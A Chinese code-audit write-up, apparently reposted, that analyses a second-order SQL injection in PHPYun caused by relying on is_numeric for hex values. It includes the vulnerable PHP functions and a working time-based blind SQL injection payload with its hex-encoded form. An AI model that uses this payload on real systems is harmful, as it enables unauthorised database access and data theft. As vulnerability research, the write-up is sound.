二次注入 php,危险的is_numeric——PHPYun 2015-06-26 二次注入漏洞分析

2023-10-08 19:50
文章标签 分析 php 漏洞 注入 2015 06 26 危险 二次 numeric phpyun

本文主要是介绍二次注入 php,危险的is_numeric——PHPYun 2015-06-26 二次注入漏洞分析,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

今天分析是PHPYun的一个二次注入漏洞(漏洞详情)。

0x00 知识前提

PHP提供了is_numeric函数,用来变量判断是否为数字。但是函数的范围比较广泛,不仅仅是十进制的数字。

echo is_numeric(233333); # 1

echo is_numeric('233333'); # 1

echo is_numeric(0x233333); # 1

echo is_numeric('0x233333'); # 1

echo is_numeric('233333abc'); # 0

?>

MySQL数据库同样支持16进制,也就是HEX编码。虽然不像is_numeric函数一样有着比较强的容错性,但还是能够完成如下操作。

> insert into test (id, value) values (1, 0x74657374);

> select * from test;

| id | value |

| 1 | test |

以上两点单独看起来都没什么问题,但如果遇到合适的场景,比如程序猿只是用is_numeric函数验证变量是否为数字,就很有可能插入一些特殊字符到数据库中。虽然不能造成直接的SQL注入,但危险的数据已经悄悄潜伏在了路边,就等你经过。

0x10 寻找可利用的is_numeric

我们现在已经知道了is_numeric是个危险的函数,全局搜索的结果有很多,我们进一步筛选一下:

变量仅仅通过is_numeric判断是否为数字,没有经过Intval处理

变量插入/更新数据库的时候没有加引号(二次注入,需要先引入数据)

经过人肉筛选之后,我们得到了一个函数:

# /app/public/action.class.php

function FormatValues($Values){

$ValuesStr='';

foreach($Values as $k=>$v){

if(is_numeric($k)){

$ValuesStr.=','.$v;

}else{

if(is_numeric($v)){

$ValuesStr.=',`'.$k.'`='.$v;

}else{

$ValuesStr.=',`'.$k.'`=\''.$v.'\'';

}

}

}

return substr($ValuesStr,1);

}

这是个中间函数,我们搜一下哪里用到了这个函数。

e7cf997d6ccb

QQ图片20150925113937.jpg

多个数据表模型都用到了这个函数,基本都是Update操作。现在的思路是利用接口将恶意代码Update进数据库,再通过其他接口,从数据库读恶意数据,在再次存到数据库的时候,进行注入。接下来的任务,是筛选能造成二次注入的点。

0x20 二次注入点

寻找二次注入的过程,是重复性的工作。根据全局搜索得出的多个模型,找到对应的控制层的代码,根据如下条件去筛选:

恶意代码insert/update到数据库

从数据库select数据,再将数据拼接到新的语句中(没有再次转义)

举个例子,ask.model.php中,出现了五次FormatValues。分别是:

UpdateAttention

UpdateQclass

UpdateAnswer

UpdateQuestion

SaveQuestion

搜索UpdateAttention:

e7cf997d6ccb

QQ图片20151010202101.png

可以看到$type, 也就是写进attention表的type,是可用的。但是在数据库中查过之后,发现type的数据结构是int(11),太短,放弃。

再继续查,UpdateQclass,没有实际用到。继续,UpdateAnswer:

e7cf997d6ccb

Q7A%XXP}L}10VKCH4K76@21.png

验证后,也没有可用的。用这种方法,逐个去排除,直到:

e7cf997d6ccb

$2[Y@UCJ09R]IWE}1XX(AAQ.png

跟进函数:

function saveinfo_action(){

if($_POST['submitBtn']){

$M=$this->MODEL('friend');

unset($_POST['submitBtn']);

$nid=$M->SaveFriendInfo($_POST,array("uid"=>$this->uid));

if($nid){

$state_content = "我刚修改了个性签名
[".$_POST['description']."]。";

$this->addstate($state_content);

$M->member_log("修改朋友圈基本信息");

$this->ACT_layer_msg("更新成功!",9,$_SERVER['HTTP_REFERER']);

}else{

$this->ACT_layer_msg("更新失败!",8,$_SERVER['HTTP_REFERER']);

}

}

}

再看一下friend_info表(从SaveFriendInfo()可以得到表名),nickname、description的数据结构都是varchar(100)。

终于找到了恶意代码插入点,接下来看看能不能利用。从DB层(friend.model.php)可以找到GetFriendInfo():

function GetFriendInfo($Where=array(),$Options=array()){

$WhereStr=$this->FormatWhere($Where);

$FormatOptions=$this->FormatOptions($Options);

$row=$this->DB_select_once('friend_info',$WhereStr,$FormatOptions['field']);

if($row['pic']==''){

$row['pic']=$row['pic_big']=$this->config['sy_weburl'].'/'.$this->config['sy_friend_icon'];

}else{

$row['pic'] = str_replace("../",$this->config['sy_weburl']."/",$row['pic']);

$row['pic_big'] = str_replace("../",$this->config['sy_weburl']."/",$row['pic_big']);

}

return $row;

}

从数据库读出来的数据,处理了一下pic参数,就返回了。搜索一下哪里用到了这个函数:

e7cf997d6ccb

Paste_Image.png

逐个排除,定位到函数:

e7cf997d6ccb

Paste_Image.png

跟进member_log函数:

function member_log($content,$opera='',$type=''){

if($_COOKIE['uid']){

$value="`uid`='".(int)$_COOKIE['uid']."',";

$value.="`usertype`='".(int)$_COOKIE['usertype']."',";

$value.="`content`='".$content."',";

$value.="`opera`='".$opera."',";

$value.="`type`='".$type."',";

$value.="`ip`='".fun_ip_get()."',";

$value.="`ctime`='".time()."'";

$this->DB_insert_once("member_log",$value);

}

}

跟进DB_insert_once函数:

function DB_insert_once($tablename, $value){

$SQL = "INSERT INTO `" . $this->def . $tablename . "` SET ".$value;

$this->db->query("set sql_mode=''");

$this->db->query($SQL);

$nid= $this->db->insert_id();

return $nid;

}

成功找到注入点。

0x20 利用

e7cf997d6ccb

AE49DB213E9045058ADCB1C68EE729DE.png

INSERT INTO `phpyun_atn` SET `uid`='2',`sc_uid`='1',`usertype`='1',`sc_usertype`='1',`time`='1444726415'

INSERT INTO `phpyun_friend_state` SET `uid`='2',`content`='关注了\'\"',`type`='2',`ctime`='1444726415'

INSERT INTO `phpyun_sysmsg` SET `fa_uid`='1',`content`='用户 bb2 关注了你!',`username`='bb1',`ctime`='1444726415'

INSERT INTO `phpyun_member_log` SET `uid`='2',`usertype`='1',`content`='关注了'"',`opera`='',`type`='',`ip`='127.0.0.1',`ctime`='1444726415'

1

第四条SQL语句成功注入。

构造payload

构造一个基于时间的盲注:

',ip=(select if(mid(user(),1,1)='r',sleep(5),0))#

0x20272c69703d2873656c656374206966286d6964287573657228292c312c31293d2772272c736c6565702835292c30292923

成功延时注入:

e7cf997d6ccb

Paste_Image.png

0x30 总结

代码审计,有很多重复性的工作。拼的就是耐心和经验。这篇文章,算是手把手教如何审计二次注入漏洞了。之后会更多的关注PHP函数使用不当导致的漏洞,敬请期待。

这篇关于二次注入 php,危险的is_numeric——PHPYun 2015-06-26 二次注入漏洞分析的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!


http://www.chinasem.cn/article/167625

相关文章

性能分析之MySQL索引实战案例

性能分析之MySQL索引实战案例

文章目录 一、前言二、准备三、MySQL索引优化四、MySQL 索引知识回顾五、总结 一、前言 在上一讲性能工具之 JProfiler 简单登录案例分析实战中已经发现SQL没有建立索引问题,本文将一起从代码层去分析为什么没有建立索引? 开源ERP项目地址:https://gitee.com/jishenghua/JSH_ERP 二、准备 打开IDEA找到登录请求资源路径位置
阅读更多...
06 C++Lambda表达式

06 C++Lambda表达式

lambda表达式的定义 没有显式模版形参的lambda表达式 [捕获] 前属性 (形参列表) 说明符 异常 后属性 尾随类型 约束 {函数体} 有显式模版形参的lambda表达式 [捕获] <模版形参> 模版约束 前属性 (形参列表) 说明符 异常 后属性 尾随类型 约束 {函数体} 含义 捕获:包含零个或者多个捕获符的逗号分隔列表 模板形参:用于泛型lambda提供个模板形参的名
阅读更多...
SWAP作物生长模型安装教程、数据制备、敏感性分析、气候变化影响、R模型敏感性分析与贝叶斯优化、Fortran源代码分析、气候数据降尺度与变化影响分析

SWAP作物生长模型安装教程、数据制备、敏感性分析、气候变化影响、R模型敏感性分析与贝叶斯优化、Fortran源代码分析、气候数据降尺度与变化影响分析

查看原文>>>全流程SWAP农业模型数据制备、敏感性分析及气候变化影响实践技术应用 SWAP模型是由荷兰瓦赫宁根大学开发的先进农作物模型,它综合考虑了土壤-水分-大气以及植被间的相互作用;是一种描述作物生长过程的一种机理性作物生长模型。它不但运用Richard方程,使其能够精确的模拟土壤中水分的运动,而且耦合了WOFOST作物模型使作物的生长描述更为科学。 本文让更多的科研人员和农业工作者
阅读更多...
MOLE 2.5 分析分子通道和孔隙

MOLE 2.5 分析分子通道和孔隙

软件介绍 生物大分子通道和孔隙在生物学中发挥着重要作用,例如在分子识别和酶底物特异性方面。 我们介绍了一种名为 MOLE 2.5 的高级软件工具,该工具旨在分析分子通道和孔隙。 与其他可用软件工具的基准测试表明,MOLE 2.5 相比更快、更强大、功能更丰富。作为一项新功能,MOLE 2.5 可以估算已识别通道的物理化学性质。 软件下载 https://pan.quark.cn/s/57
阅读更多...
衡石分析平台使用手册-单机安装及启动

衡石分析平台使用手册-单机安装及启动

单机安装及启动​ 本文讲述如何在单机环境下进行 HENGSHI SENSE 安装的操作过程。 在安装前请确认网络环境,如果是隔离环境,无法连接互联网时,请先按照 离线环境安装依赖的指导进行依赖包的安装,然后按照本文的指导继续操作。如果网络环境可以连接互联网,请直接按照本文的指导进行安装。 准备工作​ 请参考安装环境文档准备安装环境。 配置用户与安装目录。 在操作前请检查您是否有 sud
阅读更多...
线性因子模型 - 独立分量分析(ICA)篇

线性因子模型 - 独立分量分析(ICA)篇

序言 线性因子模型是数据分析与机器学习中的一类重要模型,它们通过引入潜变量( latent variables \text{latent variables} latent variables)来更好地表征数据。其中,独立分量分析( ICA \text{ICA} ICA)作为线性因子模型的一种,以其独特的视角和广泛的应用领域而备受关注。 ICA \text{ICA} ICA旨在将观察到的复杂信号
阅读更多...
【软考】希尔排序算法分析

【软考】希尔排序算法分析

目录 1. c代码2. 运行截图3. 运行解析 1. c代码 #include <stdio.h>#include <stdlib.h> void shellSort(int data[], int n){// 划分的数组,例如8个数则为[4, 2, 1]int *delta;int k;// i控制delta的轮次int i;// 临时变量,换值int temp;in
阅读更多...
三相直流无刷电机(BLDC)控制算法实现:BLDC有感启动算法思路分析

三相直流无刷电机(BLDC)控制算法实现:BLDC有感启动算法思路分析

一枚从事路径规划算法、运动控制算法、BLDC/FOC电机控制算法、工控、物联网工程师,爱吃土豆。如有需要技术交流或者需要方案帮助、需求:以下为联系方式—V 方案1:通过霍尔传感器IO中断触发换相 1.1 整体执行思路 霍尔传感器U、V、W三相通过IO+EXIT中断的方式进行霍尔传感器数据的读取。将IO口配置为上升沿+下降沿中断触发的方式。当霍尔传感器信号发生发生信号的变化就会触发中断在中断
阅读更多...
kubelet组件的启动流程源码分析

kubelet组件的启动流程源码分析

概述 摘要: 本文将总结kubelet的作用以及原理,在有一定基础认识的前提下,通过阅读kubelet源码,对kubelet组件的启动流程进行分析。 正文 kubelet的作用 这里对kubelet的作用做一个简单总结。 节点管理 节点的注册 节点状态更新 容器管理(pod生命周期管理) 监听apiserver的容器事件 容器的创建、删除(CRI) 容器的网络的创建与删除
阅读更多...
PostgreSQL核心功能特性与使用领域及场景分析

PostgreSQL核心功能特性与使用领域及场景分析

PostgreSQL有什么优点? 开源和免费 PostgreSQL是一个开源的数据库管理系统,可以免费使用和修改。这降低了企业的成本,并为开发者提供了一个活跃的社区和丰富的资源。 高度兼容 PostgreSQL支持多种操作系统(如Linux、Windows、macOS等)和编程语言(如C、C++、Java、Python、Ruby等),并提供了多种接口(如JDBC、ODBC、ADO.NET等
阅读更多...

Copyright China编程 23002807@qq.com

沪ICP备2023033072号-2